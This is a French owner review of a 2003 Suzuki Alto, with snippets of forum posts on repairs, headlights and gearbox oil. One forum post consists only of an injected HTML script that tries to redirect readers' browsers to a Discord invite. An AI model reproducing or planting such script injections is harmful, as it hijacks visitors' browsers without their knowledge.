1.1 5P - 2003

le 20 Janvier 2015 à 14h24

Bonjour,

Je suis propriétaire d'une Alto depuis 2004.Elle a 129 000km environ.

Si les pièces de rechange sont parfois onéreuses par rapport à celle d'un véhicule plus "européen" ,en revanche ma voiture n'a pas eu beaucoup de soucis, elle est fiable et économique.J'ai dû changer une sonde moteur,une barre stabilisatrice rongée par la rouille (causée par les produits de déneigement vraisemblablement)et récemment le silencieux du pot d'échappement.

Sinon je fais régulièrement la visite d'entretien (vidange ,bougie,...) et ça roule.Par contre j'ai la plage arrière qui ne tient plus en place, les supports ont lâché.Quant au vérin de la porte du coffre ,il a du jeu ,du coup il faut la tenir pour se servir dans le coffre.

Elle consomme environ 5.5l/100km ,un peu plus l'hiver à cause du chauffage.

C'est une citadine en revanche,ne pas lui en demander plus.

• Fiable
  • Economique

• Prix des pièces de rechange

Forum : derniers sujets Suzuki Alto

Clé de démarrage pour Suzuki Alto

Par dada125 le 03 Septembre 2020 à 20h55

Si c'est comme chez opel il faut la valise speciale du constructeur tech2 chez opel Si tu ne disposes pas de cette valise suuzuki j'ai bien peur que ce ne soie peine perdue Je reste quand meme a l'affut si tu trouves une solution

Démonter le rétro extérieur de mon ALTO de 2014

Par philippev77 le 21 Janvier 2020 à 06h27

Bonjour à tous Suite à une "touchette", le rétro extérieur coté conducteur est cassé. plutôt que d'aller le faire changer chez SUZUKI ou NISSAN (si je ne me trompe pas, c'est quasi la même voiture que la PIXO) j'aimerai le faire moi même mais autant j'ai réussi a désolidariser le cache de la portière en tirant dessus, autant je n'arrive pas à retirer la "tige" qui sert à régler le rétro pour justement pouvoir ôter le cache... Comment faire : je n'arrive pas à le dévisser ni a tirer dessus Merci de vos conseils

Suzuki alto

Par AnonymeSam le 02 Décembre 2019 à 14h21

[quotemsg=111985,10,1253058] Hi Les ampoules font à la fois feux de route et feux de croisement... bizarre ce que tu dis ... Tu dois pousser le "manche" vers le tableau de bord, quand tu as tourné la bague vers le symbole feu de route pour passer en codes. Si tu le tires vers toi, c est juste pour faire un appel de phare ! Pour démarrer avec un moteur essence, il faut accélérer " un peu plus " qu avec un diesel...c est une habitude à prendre...il faut doser [/quotemsg] A oui merci j'ai compris . Oui c'est que je me suis dit aussi mais impossible de conduire avec les feux de croisement ( dangereux je ne voit pas du tout avec ) et sur le contrôle technique ya marquer que le système de projection des 2 feux sont défectueux... ça doit être ca . Je vais essayer de faire changer les ampoules

[Topic Officiel] Suzuki Alto VII (2008-2014)

Par Anonymezkx333 le 14 Septembre 2019 à 14h51

<script>document.location = "https://discord.gg/fDPFZs"<script>

[TUTORIEL] Vidange et remplissage de l'huile de boite de vitesses

Par fiocco le 26 Août 2019 à 17h53

Merci [b][url=http://club.caradisiac.com/herve97211/]herve97211[/url][/b] pour l'information qui va m’être utile, je possède la boite automatique pilotée (AGS) mais ça ne change rien c'est toujours le même moteur. 1.2 DualJet (90 Hp) AGS

Essais et comparatifs Suzuki Alto